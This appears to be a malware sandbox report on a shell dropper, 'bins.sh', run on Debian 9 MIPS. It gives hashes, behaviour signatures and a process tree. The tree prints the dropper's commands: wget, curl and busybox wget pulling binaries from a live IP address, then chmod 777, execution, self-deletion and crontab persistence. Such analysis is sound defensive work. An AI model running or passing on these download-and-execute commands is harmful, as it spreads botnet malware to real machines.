Overview

overview

9

Static

static

1

bins.sh

ubuntu-18.04-amd64

9

bins.sh

debian-9-armhf

9

bins.sh

debian-9-mips

8

bins.sh

debian-9-mipsel

8

Analysis

  • max time kernel
    123s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    24-11-2024 04:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    df284d43c50345c61fb4802b4396a3b3

  • SHA1

    ce94f3d5873280df0c3479ecd725dead3d66b5d7

  • SHA256

    65bb3378f20346a669cf034ec3b3d7760f53296e957bd7a6d3e64bd9e0cd608c

  • SHA512

    3ed1bc581779962db46652c8e0bf1911156c49bc6b5310e7012e499cdcd8ba85876d11fae05c70e0fc4939828d3aa737bf3ff3d3d1ec4e77fa6d85c8460bb031

  • SSDEEP

    192:y5FjD5EdIO+SHL394wy2tQgL394wj0twjD5EdI3:y5K+SHL394wy6QgL394wjwO

Score
8/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • Contacts a large (1516) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:712
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:718
        • /usr/bin/wget
          wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:720
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:737
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Writes file to tmp directory
          PID:742
        • /bin/chmod
          chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • File and Directory Permissions Modification
          PID:743
        • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
          • Executes dropped EXE
          PID:744
        • /bin/rm
          rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
          2⤵
            PID:746
          • /usr/bin/wget
            wget http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            2⤵
            • Writes file to tmp directory
            PID:747
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            2⤵
            • Writes file to tmp directory
            PID:748
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            2⤵
            • Writes file to tmp directory
            PID:749
          • /bin/chmod
            chmod 777 gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            2⤵
            • File and Directory Permissions Modification
            PID:750
          • /tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            ./gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
            2⤵
            • Executes dropped EXE
            • Renames itself
            • Reads runtime system information
            PID:751
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:753
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                    PID:754
                • /bin/sh
                  sh -c "crontab -"
                  3⤵
                    PID:755
                    • /usr/bin/crontab
                      crontab -
                      4⤵
                      • Creates/modifies Cron job
                      PID:756
                • /bin/rm
                  rm gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
                  2⤵
                    PID:758
                  • /usr/bin/wget
                    wget http://216.126.231.240/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                    2⤵
                      PID:763
                    • /usr/bin/curl
                      curl -O http://216.126.231.240/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                      2⤵
                        PID:764
                      • /bin/busybox
                        /bin/busybox wget http://216.126.231.240/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                        2⤵
                        • Writes file to tmp directory
                        PID:767
                      • /bin/chmod
                        chmod 777 EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                        2⤵
                        • File and Directory Permissions Modification
                        PID:854
                      • /tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                        ./EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                        2⤵
                        • Executes dropped EXE
                        PID:856
                      • /bin/rm
                        rm EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                        2⤵
                          PID:858
                        • /usr/bin/wget
                          wget http://216.126.231.240/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                          2⤵
                            PID:859
                          • /usr/bin/curl
                            curl -O http://216.126.231.240/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                            2⤵
                              PID:860
                            • /bin/busybox
                              /bin/busybox wget http://216.126.231.240/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                              2⤵
                              • Writes file to tmp directory
                              PID:863
                            • /bin/chmod
                              chmod 777 Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                              2⤵
                              • File and Directory Permissions Modification
                              PID:870
                            • /tmp/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                              ./Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                              2⤵
                              • Executes dropped EXE
                              PID:871
                            • /bin/rm
                              rm Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                              2⤵
                                PID:875
                              • /usr/bin/wget
                                wget http://216.126.231.240/bins/GvcRb28XLNlF8afT4YIaxTawz6AqhxPJr7
                                2⤵
                                  PID:876
                                • /usr/bin/curl
                                  curl -O http://216.126.231.240/bins/GvcRb28XLNlF8afT4YIaxTawz6AqhxPJr7
                                  2⤵
                                    PID:879

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • /tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
                                  Filesize

                                  111KB

                                  MD5

                                  ca897a38f23ec23521ce0b1b83f8422d

                                  SHA1

                                  b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

                                  SHA256

                                  043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

                                  SHA512

                                  10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

                                  Download Submit

                                • /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
                                  Filesize

                                  141KB

                                  MD5

                                  3ca8decdb1e52c423c521bfff02ac200

                                  SHA1

                                  8621ecd6807109b8541912ad9e134f6fb49bfd48

                                  SHA256

                                  dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                                  SHA512

                                  b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                                  Download Submit

                                • /tmp/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
                                  Filesize

                                  127KB

                                  MD5

                                  89077b7bd4bcafca7713be43635c4862

                                  SHA1

                                  fc02edb8fba29ea8ee99e6157ef8560334530052

                                  SHA256

                                  78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                                  SHA512

                                  1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                                  Download Submit

                                • /tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
                                  Filesize

                                  151KB

                                  MD5

                                  6c583043d91c55aa470c08c87058e917

                                  SHA1

                                  abf65a5b9bba69980278ad09356e53de8bb89439

                                  SHA256

                                  2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                                  SHA512

                                  82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                                  Download Submit

                                • /var/spool/cron/crontabs/tmp.ju3uJd
                                  Filesize

                                  210B

                                  MD5

                                  38871c30c6dd976e31c15d7d9b402361

                                  SHA1

                                  6f392f733b3a18e0a72ef55a80a410ca171da320

                                  SHA256

                                  0aae3a8ee12121f97970e302cf6da47292d2d2d55b49976ef28ff0e0ad501bb5

                                  SHA512

                                  3127e7cbb08d4c7e7e2d6ffbab9e5a1de91ebcf2a1b5d9d9dd5fa0f3f7f2cc68422e184a8388455f49af31b3353ea343fc041acd29515f91aca2128523e4c7c4

                                  Download Submit